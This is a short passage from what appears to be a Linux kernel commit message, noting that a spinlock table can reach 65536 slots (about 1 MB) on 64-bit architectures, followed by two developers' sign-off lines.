Maximal size on 64bit arches would be 65536 slots, ie 1 MBytes for non
debugging spinlocks.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>